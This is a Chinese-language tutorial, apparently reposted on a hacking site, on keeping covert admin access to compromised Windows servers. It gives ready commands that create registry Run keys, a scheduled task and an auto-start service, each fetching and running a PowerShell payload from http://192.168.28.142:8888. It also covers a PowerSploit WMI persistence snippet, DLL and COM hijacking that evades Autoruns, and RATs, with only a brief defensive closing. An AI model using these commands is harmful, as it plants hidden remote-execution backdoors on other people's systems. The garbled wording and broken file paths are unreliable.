您现在的位置是:首页 > 黑客技术

Window下普遍的管理权限保持方法

作者:果E安全网时间:2020-10-25 21:09:23分类:黑客技术

简介在获得网络服务器管理权限后,一般会用一些后门技术性来保持网络服务器管理权限,网络服务器一旦被嵌入后门,网络攻击便如入无人之境。文中将对普遍的window服务器端自启动后门技术性开展分析,知彼知己方能避免后门。0x01注册表自启动根据改动注册表自启动键值,加上一个恶意代码途径,完成启动自启动。常见的注册表起动键:应用下列指令能够

在获得网络服务器管理权限后,一般会用一些后门技术性来保持网络服务器管理权限,网络服务器一旦被嵌入后门,网络攻击便如入无人之境。文中将对普遍的window服务器端自启动后门技术性开展分析,知彼知己方能避免后门。

0x01 注册表自启动

根据改动注册表自启动键值,加上一个恶意代码途径,完成启动自启动。

常见的注册表起动键:

应用下列指令能够一键完成无文档注册表后门:

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:WindowsSystem32WindowsPowerShellv1.1080owershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))"" /f

Logon Scripts 后门

注册表途径:HKEY_CURRENT_USEREnvironment

建立字符串数组键值: UserInitMprLogonScript,键值设定为bat的绝对路径:c:test.bat

userinit后门

在客户开展登录时,winlogon运作特定的程序流程。依据官方网文本文档,能够变更它的值来加上与删除程序。

利用USERINIT注册表键完成无文档后门:

0x02 组策略设定脚本制作起动

运作gpedit.msc进到本地组策略,根据Windows设定的“脚本制作(起动/待机)”项而言完成。由于其具有防御性,因而经常被网络攻击利用来做网络服务器后门。

2.png

非常容易碰到的难题:脚本制作需全途径,如

C:WindowsSystem32WindowsPowerShellv1.1080owershell.exe

0x03 任务计划

根据window系统软件的任务计划程序流程作用完成定时执行起动某一每日任务,实行某一脚本制作。

应用下列指令能够一键完成:

schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring("""http://192.168.28.142:8888/logo.gif"""))""

非常容易碰到的难题:cmdcmd实行单引号会被换成双引号,故这儿应用三个双引号取代。

方案脚本制作每 1 分鐘运作一次。

3.png

0x04 服务项目自启动

根据服务项目设定自启动,融合powershell完成无文档后门。

应用下列指令可完成:

sc create "KeyName" binpath= "cmd /c start powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))""

sc description KeyName "Just For Test" //设定服务项目的叙述字符串数组

sc config Name start= auto //设定这一服务项目为自动启动

net start Name //起动服务项目取得成功建立了一个自启动服务项目。

4.png

0x05 WMI后门

在二零一五年的blackhat大大会上Matt Graeber详细介绍了一种无文档后门便是用的WMI。这儿能够利用一个专用工具powersploit,下边用它的Persistence控制模块来示范性一个简易的事例

Import-Module .PersistencePersistence.psm1

$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'

$UserOptions = New-UserPersistenceOption -Registry -AtLogon

Add-Persistence -FilePath .EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

0x06 dll劫持

假如在过程试着载入一个DLL时沒有特定DLL的绝对路径,那麼Windows会试着去特定的文件目录下搜索这一DLL;假如网络攻击可以操纵在其中的某一 个文件目录,而且放一个故意的DLL文件到这一文件目录下,这一故意的DLL便会被过程所载入,进而导致代码执行。

较为常见的如LPK.dll的劫持:

win7及win7之上系统软件提升了KnownDLLs维护,必须在注册表:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSessionManagerExcludeFromKnownDlls

下加上 “lpk.dll” 才可以成功劫持:

5.png

0x07 COM劫持

利用COM劫持技术性,更为重要的是dll的完成及其CLSID的挑选,根据改动CLSID下的注册表键值,完成对CAccPropServicesClass和MMDeviceEnumerator劫持,而系统软件许多 一切正常程序流程启动必须启用这两个案例。这类方式能够绕开Autoruns对开机启动项的检验。

6.png

0x08 远程操作

远程控制木马病毒是一种恶意软件,在其中包含在总体目标电子计算机上用以监督控制的后门。远程登录木马病毒一般与客户要求的程序流程(如游戏客户端)一起,是一种看不到的免费下载,或做为电子邮箱配件推送。一旦软件系统被攻克,侵略者能够利用它来向别的易受感柒的电子计算机派发远程登录木马病毒,进而创建拒绝服务攻击。

一般分成手机客户端和服务器端,如:灰鸽子、上兴远程控制、理想时期、QuasarRAT等。

7.png

0x09 结语

不明攻焉知防,文中共享了几类Window下的自启动管理权限保持技术性。管理人员在平常运维管理全过程理应提高警惕,把握一定的侵入清查方法,立即开展漏洞补丁升级,按时对网络服务器安全大检查,才可以合理地防止后门。

文中为安全性脉率栏目创作者公布,转截请标明:https://www.secpulse.com/archives/120223.html

上一篇【基本向】实战演练解读内网渗透构思下一篇(CVE-2019-11157)危害intelSGX

郑重声明:

果E安全网所有活动均为互联网所得,如有侵权请联系本站删除处理,转载请注明本站地址。

我来说两句